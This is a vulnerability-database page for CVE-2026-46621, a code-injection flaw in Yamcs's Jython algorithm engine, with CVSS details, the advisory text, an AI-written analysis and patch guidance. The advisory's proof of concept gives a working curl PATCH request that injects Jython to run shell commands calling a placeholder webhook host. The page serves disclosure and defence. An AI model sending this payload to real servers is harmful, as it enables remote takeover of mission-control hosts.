Skip to main content

Yamcs CVE-2026-46621

CRITICAL
Code Injection (CWE-94)
2026-05-27 https://github.com/yamcs/yamcs GHSA-2g95-6x5q-xjwj
9.1
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.1 CRITICAL
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
May 27, 2026 - 23:15 vuln.today
Analysis Generated
May 27, 2026 - 23:15 vuln.today
CVE Published
May 27, 2026 - 22:49 nvd
CRITICAL 9.1

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 6 maven packages depend on org.yamcs:yamcs-core (6 direct, 0 indirect)

Ecosystem-wide dependent count for version 5.12.7.

DescriptionGitHub Advisory

Summary

A Server-Side Code Injection vulnerability exists in the Yamcs script evaluation engine for Python algorithms. The application dynamically compiles and evaluates user-controlled algorithm text using Jython (via the JSR-223 ScriptEngine API) without enforcing a secure sandbox. An authenticated user with the ChangeMissionDatabase privilege can exploit this by overriding the algorithm logic through the REST API, achieving Remote Code Execution (RCE) on the underlying host operating system.

Details

The vulnerability lies in how Yamcs handles dynamic script evaluation. When a user updates an algorithm via the MDB (Mission Database) API (/api/mdb/{instance}/realtime/algorithms/{name}), the AlgorithmManager uses the ScriptAlgorithmExecutorFactory to instantiate a JSR-223 ScriptEngine (in this case, Jython/Python).

Because Jython allows seamless interoperability with native Java classes, an attacker can import and execute arbitrary Java classes such as java.lang.Runtime. Any valid Python algorithm can be overwritten with a malicious payload that executes OS-level commands.

PoC

Prerequisites:

  1. A running Yamcs instance with the Jython engine available in its classpath (e.g., jython-standalone dependency included).
  2. An active authentication token for a user with the SystemPrivilege.ChangeMissionDatabase privilege.
  3. An existing algorithm defined in the Mission Database (MDB) with its language explicitly set to python (e.g., a custom poc algorithm). *Note: Yamcs prevents changing the underlying language engine of an algorithm via the API, so an existing Python algorithm must be targeted.*

Exploitation Steps:

  1. Send an authenticated HTTP PATCH request to the MDB API endpoint to inject the malicious Jython code into the existing Python algorithm. The payload leverages java.lang.Runtime to execute an OS command (e.g., triggering an external webhook or a reverse shell).
bash
    curl -i -X PATCH http://<YAMCS-SERVER-IP>:8090/api/mdb/myproject/realtime/algorithms/myproject/poc \
         -H 'Content-Type: application/json' \
         -H 'Authorization: Bearer <YOUR_AUTH_TOKEN>' \
         -d '{
           "action": "SET",
           "algorithm": {
             "text": "import java.lang.Runtime\njava.lang.Runtime.getRuntime().exec([\"bash\", \"-c\", \"curl https://<YOUR-WEBHOOK-URL>/RCE\"])\nout0.value = 1.0"
           }
         }'

*(Note: Assigning a valid output like out0.value = 1.0 ensures the algorithm returns the expected data type to the Yamcs internal processor, preventing crash loops and ensuring clean execution).*

  1. Trigger the algorithm evaluation by sending telemetry data that the algorithm depends on (e.g., running the simulator.py script to update the required parameters like Sunsensor).
  2. The Yamcs server compiles the injected text into an executable script on the fly.
  3. Verify that the OS command executed successfully on the host machine by checking the incoming HTTP request on the provided webhook URL.

Impact

It impacts any Yamcs deployment where users are granted the ChangeMissionDatabase privilege and a scripting engine (like Jython) is present in the classpath. An attacker can leverage this to escalate application-level configuration privileges to full System/OS control, leading to arbitrary command execution, data exfiltration, and potential lateral movement within the hosting infrastructure.

Credits

Discovered & reported by Pablo Picurelli Ortiz (@superpegaso2703), cybersecurity student at Universidad Rey Juan Carlos.

AnalysisAI

Remote code execution in Yamcs (the open-source mission control framework, yamcs-core) before 5.12.7 lets an authenticated operator holding the ChangeMissionDatabase privilege overwrite a Python (Jython) algorithm via the Mission Database REST API and run arbitrary OS commands on the host. The Jython script engine is invoked without a sandbox, so injected algorithm text can import java.lang.Runtime and shell out. Publicly available exploit code exists (a full PoC is published in the GitHub Security Advisory), but the issue is not listed in CISA KEV and no public in-the-wild exploitation is identified.

Technical ContextAI

Yamcs supports user-defined telemetry/command algorithms written in scripting languages. For Python-language algorithms, the AlgorithmManager uses ScriptAlgorithmExecutorFactory to obtain a JSR-223 javax.script.ScriptEngine backed by Jython (the jython-standalone dependency). Jython compiles and evaluates the user-supplied algorithm body with no security manager or restricted execution context, and because Jython offers seamless interop with the host JVM, script code can import native Java classes such as java.lang.Runtime and ProcessBuilder. This is a textbook CWE-94 (Improper Control of Generation of Code / Code Injection) flaw: untrusted text supplied through the MDB API at /api/mdb/{instance}/realtime/algorithms/{name} is treated as executable code. The affected artifact is the Maven package pkg:maven/org.yamcs:yamcs-core.

RemediationAI

Vendor-released patch: 5.12.7 - upgrade org.yamcs:yamcs-core to 5.12.7 or later as the primary fix. Where immediate upgrade is not possible, reduce the privilege surface by auditing and revoking the SystemPrivilege.ChangeMissionDatabase grant so only a minimal, trusted set of operators retains it (trade-off: those users lose the ability to edit the Mission Database at runtime). As a stronger compensating control, remove the Jython/jython-standalone scripting engine from the deployment classpath if Python algorithms are not required, which eliminates the execution path entirely (trade-off: any existing Python-language algorithms will stop functioning). Additionally restrict network access to the Yamcs HTTP API (default port 8090), particularly the /api/mdb/{instance}/realtime/algorithms/ endpoints, to trusted management networks. See the advisory at https://github.com/yamcs/yamcs/security/advisories/GHSA-2g95-6x5q-xjwj for authoritative guidance.

More in Java

View all
CVE-2012-4681 CRITICAL POC
9.8 Aug 28

Oracle Java SE 7 Update 6 and earlier contains multiple sandbox bypass vulnerabilities via the ClassFinder and forName m

CVE-2015-7450 CRITICAL POC
9.8 Jan 02

Remote code execution in IBM Sterling B2B Integrator, Sterling Integrator, and Tivoli Common Reporting allows unauthenti

CVE-2013-2465 CRITICAL POC
9.8 Jun 18

Java Runtime Environment sandbox bypass via incorrect image channel verification in 2D component allows remote unauthent

CVE-2011-3544 CRITICAL POC
9.8 Oct 19

Oracle Java SE JDK/JRE 7 and 6 Update 27 and earlier allows remote code execution with complete system compromise throug

CVE-2010-1871 HIGH POC
8.8 Aug 05

JBoss Seam 2 in Red Hat JBoss EAP 4.3.0 fails to sanitize JBoss Expression Language inputs, allowing remote attackers to

CVE-2012-1723 CRITICAL POC
9.8 Jun 16

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 up

CVE-2013-0422 CRITICAL POC
9.8 Jan 10

Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by (1) using

CVE-2012-0507 CRITICAL POC
9.8 Jun 07

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Up

CVE-2015-4852 CRITICAL POC
9.8 Nov 18

The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers

CVE-2012-5076 CRITICAL POC
9.8 Oct 16

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allow

CVE-2017-3066 CRITICAL POC
9.8 Apr 27

Remote unauthenticated attackers can execute arbitrary code on Adobe ColdFusion servers through Java deserialization fla

CVE-2012-0391 CRITICAL POC
9.8 Jan 08

The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during

Share

CVE-2026-46621 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy